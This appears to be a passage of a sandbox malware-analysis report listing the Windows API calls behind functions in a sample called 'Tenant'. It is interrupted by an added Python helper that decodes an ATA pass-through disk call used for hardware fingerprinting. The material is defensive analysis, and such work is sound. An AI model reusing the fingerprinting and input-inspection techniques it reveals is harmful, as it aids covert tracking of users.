• Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
• Opcode ID: bb33a382fb9ac5b99cd92910da56753894b5ccb8715efe8665fbddd9ad3c5869
• Instruction ID: 56583ba2241fea8212aa6a2ab9c6eb6c7c2b3f853465935f7293db22bee2021a
• Opcode Fuzzy Hash: bb33a382fb9ac5b99cd92910da56753894b5ccb8715efe8665fbddd9ad3c5869
• Instruction Fuzzy Hash: A33148309402085EFF388A6D8C04BFEBFE5EF95310F084B9AE481562E1C37889558F61
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00AD642B
• __isleadbyte_l.LIBCMT ref: 00AD6459
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00AD6487
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00AD64BD
Memory Dump Source
• Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
• Opcode ID: 53cc3dcb2b863660d7be6810b40ce98f19d85d39eb68ecc38b381677eacd266d
• Instruction ID: e3483bf37e088ecaf67c585b205ea62c9022dda5e80452b39849696112318c91
• Opcode Fuzzy Hash: 53cc3dcb2b863660d7be6810b40ce98f19d85d39eb68ecc38b381677eacd266d
• Instruction Fuzzy Hash: 5131C1B1600256AFDF218F75CE44BAA7BB5FF41320F15802AF86697291DB31E850DB50
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32 ref: 00B2553F
                                                                                          • Part of subcall function 00B03B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B03B4E
                                                                                          • Part of subcall function 00B03B34: GetCurrentThreadId.KERNEL32 ref: 00B03B55
                                                                                          • Part of subcall function 00B03B34: AttachThreadInput.USER32(00000000,?,00B055C0), ref: 00B03B5C
                                                                                        • GetCaretPos.USER32(?), ref: 00B25550
                                                                                        • ClientToScreen.USER32(00000000,?), ref: 00B2558B
                                                                                        • GetForegroundWindow.USER32 ref: 00B25591
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                        • String ID:
                                                                                        • API String ID: 2759813231-0
                                                                                        • Opcode ID: 4f599db776d51a9639a1f4b07c862ee355e0fc3c4bf6213fc0783d1af13d41ce
                                                                                        • Instruction ID: 4705d6b6a57ea88119239b530f97d36f2486b6312e2383af1c8665187ebfdbfd
                                                                                        • Opcode Fuzzy Hash: 4f599db776d51a9639a1f4b07c862ee355e0fc3c4bf6213fc0783d1af13d41ce
                                                                                        • Instruction Fuzzy Hash: D0312A72900108AFDB10EFB5D9859EEB7F9EF99304F1044AAF515E7241EB71AE448BA0
                                                                                        APIs
                                                                                          • Part of subcall function 00AA29E2: GetWindowLongW.USER32(?,000000EB), ref: 00AA29F3
                                                                                        • GetCursorPos.USER32(?), ref: 00B2CB7A
                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00ADBCEC,?,?,?,?,?), ref: 00B2CB8F
                                                                                        • GetCursorPos.USER32(?), ref: 00B2CBDC
                                                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00ADBCEC,?,?,?), ref: 00B2CC16
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2864067406-0
                                                                                        • Opcode ID: ce3b88e108c0e9c9747fdffb8ccc6dc14ebd1ed944b61f4c81c83f86fe55b601
                                                                                        • Instruction ID: 18456401937b0973956fc1e68889ec1f50969f9e97ffb6f88ead16c5073bfc58
                                                                                        • Opcode Fuzzy Hash: ce3b88e108c0e9c9747fdffb8ccc6dc14ebd1ed944b61f4c81c83f86fe55b601
                                                                                        • Instruction Fuzzy Hash: 2231E134600068AFCB119F59D899EBE7FF5EF49310F004099F809972A1CB355D50EFA0
                                                                                        APIs
                                                                                        • __setmode.LIBCMT ref: 00AC0BE2
                                                                                          • Part of subcall function 00AB402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00B07E51,?,?,00000000), ref: 00AB4041
                                                                                          • Part of subcall function 00AB402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00B07E51,?,?,00000000,?,?), ref: 00AB4065
                                                                                        • _fprintf.LIBCMT ref: 00AC0C19
                                                                                        • OutputDebugStringW.KERNEL32(?), ref: 00AF694C
                                                                                          • Part of subcall function 00AC4CCA: _flsall.LIBCMT ref: 00AC4CE3
                                                                                        • __setmode.LIBCMT ref: 00AC0C4E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                        • String ID:
                                                                                        • API String ID: 521402451-0
                                                                                        • Opcode ID: 27be150b8abda16283240287ae430ec3988c51ba09eb4612a66be7a0ebfb2631
                                                                                        • Instruction ID: c12d9595764c6788505daf98823ef3e80508d139b27dd4eb1e67cd9da1d05c3b
                                                                                        • Opcode Fuzzy Hash: 27be150b8abda16283240287ae430ec3988c51ba09eb4612a66be7a0ebfb2631
                                                                                        • Instruction Fuzzy Hash: 1F112431908208AADB08B7A8AD52EFE7B6DDF49320F11015DF204972C2DF615D5257A5
                                                                                        APIs
                                                                                          • Part of subcall function 00AF8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00AF8D3F
                                                                                          • Part of subcall function 00AF8D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00AF8D49
                                                                                          • Part of subcall function 00AF8D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AF8D58
                                                                                          • Part of subcall function 00AF8D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00AF8D5F
                                                                                          • Part of subcall function 00AF8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AF8D75
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00AF92C1
                                                                                        • _memcmp.LIBCMT ref: 00AF92E4
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AF931A
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00AF9321
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                        • String ID:
                                                                                        • API String ID: 1592001646-0
                                                                                        • Opcode ID: eee850e7875ac1413894aeb20863a120a2cf751f6615f70758105b86e47a687f
                                                                                        • Instruction ID: 19a6d64b170b53d9252163167f1000cc1376de6402f2beeb818dddc1cd90c9d1
                                                                                        • Opcode Fuzzy Hash: eee850e7875ac1413894aeb20863a120a2cf751f6615f70758105b86e47a687f
                                                                                        • Instruction Fuzzy Hash: E8218932E4020DAFDB10DFE4C945BFEB7B8EF44301F144199E994AB290DB70AA44CBA0
                                                                                        APIs
                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00B263BD
                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B263D7
                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B263E5
                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00B263F3
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Long$AttributesLayered
                                                                                        • String ID:
                                                                                        • API String ID: 2169480361-0
                                                                                        • Opcode ID: 950f4e925241d965f662d7efa14877d9f8817b1081153631460c939bb983bd8a
                                                                                        • Instruction ID: e2e83e5f9f40aae3970e33764d4d951014105b41512ffce02d8f37ad5ff49e49
                                                                                        • Opcode Fuzzy Hash: 950f4e925241d965f662d7efa14877d9f8817b1081153631460c939bb983bd8a
                                                                                        • Instruction Fuzzy Hash: 0211B631305524AFDB05AB28DC95FBE77D9EF86320F144159F91AC72D1CBA0AD01CB99
                                                                                        APIs
                                                                                          • Part of subcall function 00AFF858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00AFE46F,?,?,?,00AFF262,00000000,000000EF,00000119,?,?), ref: 00AFF867
                                                                                          • Part of subcall function 00AFF858: lstrcpyW.KERNEL32(00000000,?), ref: 00AFF88D
                                                                                          • Part of subcall function 00AFF858: lstrcmpiW.KERNEL32(00000000,?,00AFE46F,?,?,?,00AFF262,00000000,000000EF,00000119,?,?), ref: 00AFF8BE
                                                                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00AFF262,00000000,000000EF,00000119,?,?,00000000), ref: 00AFE488
                                                                                        • lstrcpyW.KERNEL32(00000000,?), ref: 00AFE4AE
                                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00AFF262,00000000,000000EF,00000119,?,?,00000000), ref: 00AFE4E2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrcmpilstrcpylstrlen
                                                                                        • String ID: cdecl
                                                                                        • API String ID: 4031866154-3896280584
                                                                                        • Opcode ID: 3fd1b7ae3ffdb3fc52b6ae1edb7ce8b2bcfa93db80b70d65ada1474c64b868a9
                                                                                        • Instruction ID: a4fd37cd00dbf1277fc6dcc6f5cc0d110af2a6185e242a7b7e2c4f435ae94860
                                                                                        • Opcode Fuzzy Hash: 3fd1b7ae3ffdb3fc52b6ae1edb7ce8b2bcfa93db80b70d65ada1474c64b868a9
                                                                                        • Instruction Fuzzy Hash: 2B11BE3A200349AFCB25AF64D845D7E77A8FF45350B40402EFA06CB2A0EB719940C795
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 00AD5331
                                                                                          • Part of subcall function 00AC593C: __FF_MSGBANNER.LIBCMT ref: 00AC5953
                                                                                          • Part of subcall function 00AC593C: __NMSG_WRITE.LIBCMT ref: 00AC595A
                                                                                          • Part of subcall function 00AC593C: RtlAllocateHeap.NTDLL(01110000,00000000,00000001,?,00000004,?,?,00AC1003,?), ref: 00AC597F
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap_free
                                                                                        • String ID:
                                                                                        • API String ID: 614378929-0
                                                                                        • Opcode ID: d8c96e75e24e3fd1ca379b513aa166463fcc31f8f4101b2f397e138b484914de
                                                                                        • Instruction ID: 487d540e2427fba2e052799d458817a6cae8614ac09208e5b988898553fcdeeb
                                                                                        • Opcode Fuzzy Hash: d8c96e75e24e3fd1ca379b513aa166463fcc31f8f4101b2f397e138b484914de
                                                                                        • Instruction Fuzzy Hash: 54119832905A19AFCF253F74E925B9E3A946F143A0B11451FF4569F290DE7489409790
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00B04385
                                                                                        • _memset.LIBCMT ref: 00B043A6
                                                                                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00B043F8
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B04401
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                        • String ID:
                                                                                        • API String ID: 1157408455-0
                                                                                        • Opcode ID: d253bdae6f2f47d2286d781b9250c72c86d98c71531f7a28c79b8b08b325226f
                                                                                        • Instruction ID: 86643eb481b3578880cc8328da5451c70a1e70cd627b1c825a8654f09def5091
                                                                                        • Opcode Fuzzy Hash: d253bdae6f2f47d2286d781b9250c72c86d98c71531f7a28c79b8b08b325226f
                                                                                        • Instruction Fuzzy Hash: 3C1198B59012287AD7309BA5AC4DFAFBB7CEF45760F1045DAF908E7190D6744E808BA4
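                                                                                        The CreateFileW/DeviceIoControl pair listed above (a device opened with access C0000000 and share mode 3, then control code 0004D02C issued with 0x200-byte input and output buffers) is easier to assess once the raw constants are decoded. The Python helper below is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses "APIs" lines in the report's own format and decodes the CTL_CODE layout of the control code and the CreateFileW flag words. The control-code name table is rebuilt from the public winioctl.h/ntddscsi.h definitions via the CTL_CODE formula and is assumed to be the small subset an analyst meets when triaging storage-device access; any other code is still decomposed into its fields, just left unnamed.

```python
"""Decode DeviceIoControl / CreateFileW constants from Joe Sandbox 'APIs' lines.

Added analyst helper; it is not code from the report or from the sample.
Input lines look like:
  • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00B04385
  • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00B043F8
"""
import re

# Name "." Module, optional "(args)", then "ref: <addr>". Greedy args so that
# annotated values such as 00000003(TokenIntegrityLevel) keep their parentheses.
API_LINE = re.compile(
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{6,8})"
)

def _parse_arg(token):
    token = token.strip()
    if token == "?":
        return None                      # value not recovered by the sandbox
    token = token.split("(")[0]          # drop annotation: 00000003(TokenIntegrityLevel) -> 3
    try:
        return int(token, 16)
    except ValueError:
        return token                     # string argument, e.g. "cdecl" (a purely hex-looking word would be misread as a number)

def parse_api_line(line):
    """Return {'api','module','args','ref'} for one report line, or None if it is not an API line."""
    m = API_LINE.search(line)
    if not m:
        return None
    args = m.group("args")
    return {
        "api": m.group("api"),
        "module": m.group("module"),
        "args": [_parse_arg(t) for t in args.split(",")] if args else [],
        "ref": int(m.group("ref"), 16),
    }

# CTL_CODE(DeviceType, Function, Method, Access) bit layout from winioctl.h
def ctl_code(device_type, function, method, access):
    return (device_type << 16) | (access << 14) | (function << 2) | method

METHOD_NAMES = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT", 2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS_NAMES = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS", 2: "FILE_WRITE_ACCESS",
                3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}
IOCTL_SCSI_BASE, IOCTL_DISK_BASE, IOCTL_STORAGE_BASE = 0x04, 0x07, 0x2D   # FILE_DEVICE_CONTROLLER / DISK / MASS_STORAGE
# Assumption: only the storage pass-through / identification codes an analyst usually meets.
KNOWN_IOCTLS = {
    ctl_code(IOCTL_SCSI_BASE, 0x0401, 0, 3): "IOCTL_SCSI_PASS_THROUGH",
    ctl_code(IOCTL_SCSI_BASE, 0x0405, 0, 3): "IOCTL_SCSI_PASS_THROUGH_DIRECT",
    ctl_code(IOCTL_SCSI_BASE, 0x040A, 0, 3): "IOCTL_IDE_PASS_THROUGH",
    ctl_code(IOCTL_SCSI_BASE, 0x040B, 0, 3): "IOCTL_ATA_PASS_THROUGH",
    ctl_code(IOCTL_SCSI_BASE, 0x040C, 0, 3): "IOCTL_ATA_PASS_THROUGH_DIRECT",
    ctl_code(IOCTL_STORAGE_BASE, 0x0500, 0, 0): "IOCTL_STORAGE_QUERY_PROPERTY",
    ctl_code(IOCTL_DISK_BASE, 0x0022, 0, 3): "SMART_RCV_DRIVE_DATA",
}

def decode_ctl_code(code):
    """Split a DeviceIoControl control code into its CTL_CODE fields and name it if known."""
    return {
        "device_type": (code >> 16) & 0xFFFF,
        "access": ACCESS_NAMES[(code >> 14) & 0x3],
        "function": (code >> 2) & 0xFFF,
        "method": METHOD_NAMES[code & 0x3],
        "name": KNOWN_IOCTLS.get(code),
    }

GENERIC_RIGHTS = [(0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE"),
                  (0x20000000, "GENERIC_EXECUTE"), (0x10000000, "GENERIC_ALL")]
SHARE_MODES = [(0x1, "FILE_SHARE_READ"), (0x2, "FILE_SHARE_WRITE"), (0x4, "FILE_SHARE_DELETE")]
DISPOSITIONS = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = [(0x80, "FILE_ATTRIBUTE_NORMAL"), (0x40000000, "FILE_FLAG_OVERLAPPED"),
              (0x20000000, "FILE_FLAG_NO_BUFFERING"), (0x04000000, "FILE_FLAG_DELETE_ON_CLOSE")]

def _flag_names(value, table):
    if not isinstance(value, int):
        return "?"                       # argument was not recovered
    names = [name for bit, name in table if value & bit]
    return "|".join(names) if names else f"0x{value:X}"

def decode_createfile(args):
    """args: the seven CreateFileW parameters in call order."""
    _, access, share, _, disposition, flags, _ = args
    return {
        "access": _flag_names(access, GENERIC_RIGHTS),
        "share": _flag_names(share, SHARE_MODES),
        "disposition": "?" if not isinstance(disposition, int) else DISPOSITIONS.get(disposition, f"0x{disposition:X}"),
        "flags": _flag_names(flags, FILE_FLAGS),
    }

def decode_report_lines(lines):
    """Parse every API line and attach a 'decoded' view for the calls this helper understands."""
    findings = []
    for line in lines:
        call = parse_api_line(line)
        if call is None:
            continue
        if call["api"] == "CreateFileW" and len(call["args"]) == 7:
            call["decoded"] = decode_createfile(call["args"])
        elif call["api"] == "DeviceIoControl" and len(call["args"]) == 8 and isinstance(call["args"][1], int):
            call["decoded"] = decode_ctl_code(call["args"][1])
            call["decoded"]["buffer_sizes"] = (call["args"][3], call["args"][5])   # nInBufferSize, nOutBufferSize
        findings.append(call)
    return findings

# The four lines of the function block above, copied from the report as sample input.
SAMPLE_BLOCK = """
• CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00B04385
• _memset.LIBCMT ref: 00B043A6
• DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00B043F8
• CloseHandle.KERNEL32(00000000), ref: 00B04401
""".strip().splitlines()

if __name__ == "__main__":
    for call in decode_report_lines(SAMPLE_BLOCK):
        print(f"{call['api']:<16} @ {call['ref']:08X} {call.get('decoded', '')}")
```

                                                                                        Run against the block, the helper reports the handle as opened GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, and 0004D02C as IOCTL_ATA_PASS_THROUGH (device type 4, function 0x40B, METHOD_BUFFERED, read/write access) with 0x200-byte buffers. That combination is what a process uses to send an ATA command, typically IDENTIFY DEVICE, to a physical drive and read back its model and serial number, a common hardware-fingerprinting step. The report does not recover the path passed to CreateFileW (shown as "?"), so confirming the target drive requires the string or argument from the memory dump rather than this listing alone.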
                                                                                        APIs
                                                                                          • Part of subcall function 00AB402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00B07E51,?,?,00000000), ref: 00AB4041
                                                                                          • Part of subcall function 00AB402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00B07E51,?,?,00000000,?,?), ref: 00AB4065
                                                                                        • gethostbyname.WSOCK32(?,?,?), ref: 00B16A84
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00B16A8F
                                                                                        • _memmove.LIBCMT ref: 00B16ABC
                                                                                        • inet_ntoa.WSOCK32(?), ref: 00B16AC7
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                        • String ID:
                                                                                        • API String ID: 1504782959-0
                                                                                        • Opcode ID: eb6b912e64a167b8bfd1af29637bdce0cd4561042c17309de6409ce253267eab
                                                                                        • Instruction ID: 2a95e7ca41dd7eb689c86435295c153c2d3131b111b3f8c1b43312901e54c018
                                                                                        • Opcode Fuzzy Hash: eb6b912e64a167b8bfd1af29637bdce0cd4561042c17309de6409ce253267eab
                                                                                        • Instruction Fuzzy Hash: 5F116072500108EFCB04FBA4CE96DEEB7B8EF49311B544165F502A72A2DF31AE04DBA1
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00AF9719
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AF972B
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AF9741
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AF975C
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
